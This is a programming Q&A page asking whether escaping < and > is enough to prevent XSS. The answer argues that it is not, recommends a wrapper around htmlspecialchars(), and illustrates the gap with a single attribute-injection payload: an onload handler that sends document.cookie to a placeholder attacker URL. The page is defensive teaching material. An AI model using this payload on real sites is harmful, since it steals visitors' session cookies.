Is replacing : < and > with &lt; and &gt; enough to prevent XSS injection?

xss code-injection
Ryan picture Ryan · Jan 22, 2010 · Viewed 11.1k times · Source

I want to know if entiting the two marks < and > is enough to prevent XSS injections?

And if not, why? And what's the best solution?

Answer

alex picture alex · Jan 22, 2010

It depends very much on context.

Check out this example, from a typical forum site...

You may hotlink your avatar image. Enter the full URL.

Malicious user enters in input field

http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie)

There is no encoding there of less than and greater than, but still a big security hole.

With htmlspecialchars(), I found it a good idea to make (or use) a wrapper function of it that casts to a string, provides an easier way to disable double encoding (if necessary) and to ensure it is using the correct character set of your application. Kohana has a great example.

Related questions

How can I sanitize user input with PHP?

Is there a catchall function somewhere that works well for sanitizing user input for SQL injection and XSS attacks, while still allowing certain types of HTML tags?

Read More
What is the http-header "X-XSS-Protection"?

So I've been toying around with HTTP for fun in telnet now (i.e. just typing in telnet google.com 80 and putting in random GETs and POSTs with different headers and the like) but I've come across something that google.…

Read More
How to prevent XSS with HTML/PHP?

How do I prevent XSS (cross-site scripting) using just HTML and PHP? I've seen numerous other posts on this topic but I have not found an article that clear and concisely states how to actually prevent XSS.

Read More